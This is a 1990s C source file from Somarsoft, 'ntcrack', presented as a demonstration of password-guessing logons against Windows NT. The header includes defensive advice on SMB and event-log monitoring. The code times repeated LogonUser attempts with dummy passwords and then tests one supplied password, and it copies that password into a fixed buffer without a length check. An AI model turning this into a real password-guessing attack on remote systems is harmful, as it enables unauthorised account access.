////////////////////////////////////////////////////////////////////////////////
//
// Copyright  1995-1996 Somarsoft, All Rights Reserved
// Visit the Somarsoft Internet site at http://www.somarsoft.com.
//
// Example of "CRACK" type program for NT that could be used over the Internet 
// to attempt logging in as Administrator using a database of passwords, until 
// a password was found that worked. To prevent such attacks, be sure to disable 
// SMB networking via TCP/IP protocol (using firewalls or by manipulating NT
// bindings) and/or periodically examine security event logs for such attacks.
// Also, read the security paper at http://www.somarsoft.com/security.htm.
//
#pragma warning(disable:4201 4214)
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma hdrstop
#pragma warning(default:4201 4214)

void main(int argc, char *argv[])
{
    BOOL     frc;
    int      retcode = 1;
    DWORD    start, stop;
    DWORD    rc;
    char     buf[4096];
    int      loop;
    int      failcount = 0;
    BOOL     fDebug = FALSE;
    char     *RemoteName = NULL;
    char     *RemoteIPString = NULL;
    char     *UserName = NULL;
    char     *GoodPassword = NULL;
    char     password[17];
    HANDLE   hToken;

        //
        // process parameters)
        //
    while(argc-- > 1) {
        switch(argv[argc][1]) {
            case 'n': RemoteName     = &argv[argc][3]; break;
            case 'u': UserName       = &argv[argc][3]; break;
            case 'p': GoodPassword   = &argv[argc][3]; break;
            case 'c': failcount      = atoi(&argv[argc][3]); break;
            case 'd': fDebug         = TRUE; break;
            default : goto usage;
        }
    }
    if (!UserName || !GoodPassword)
        goto usage;
    if (RemoteName)
        printf("RemoteName=%s ", RemoteName);
    printf("User=%s PassWord=%s FailCount=%d Debug=%s\n",
            UserName, GoodPassword, failcount, (fDebug ? "True" : "False"));

        //
        // main loop
        //
    start = GetTickCount();
    for (loop = 0; loop <= failcount; loop++) {
        sprintf(password, "BADPSWD%d", loop);
        if (loop == failcount) {
            stop = GetTickCount();
            if (failcount > 0) 
                printf("\n%d failed attempts in %lu ms\n", failcount, stop - start);
            strcpy(password, GoodPassword); // test a good UserName/password combo
        }
        frc = LogonUser(UserName, 
                        RemoteName, 
                        password, 
                        LOGON32_LOGON_INTERACTIVE,
                        LOGON32_PROVIDER_DEFAULT, 
                        &hToken);
        if (frc == TRUE) {
            CloseHandle(hToken);
            printf("login succeeded, password=%s\n", password);
            retcode = 0;
        }
        else {
            if (fDebug) {
                rc = GetLastError();
                buf[0] = 0;
                FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM,
                              NULL,
                              rc,
                              0,
                              buf, 
                              sizeof(buf),
                              NULL);
                printf("login failed, password=%s rc=%lu %s\n", password, rc, buf);
            }
            else {
                if (loop > 0 && loop % 100 == 0)
                    printf(".");
            }
        }
    }
    return;

    //
    // handle error
    //
usage:
    printf("usage: ntcrack [/n=name] /u=user /p=password [/c=failcount] [/debug]\n");
    printf("   name      : NetBios name of remote computer (uppercase)\n");
    printf("               default is local computer\n");
    printf("   user      : User defined on remote computer\n");
    printf("   password  : Password to test\n");
    printf("   failcount : Number of simulated failed logons\n");
    printf("   debug will cause verbose output\n");
    if (argc > 0)
        printf("bad arg=%s\n", argv[argc]);
}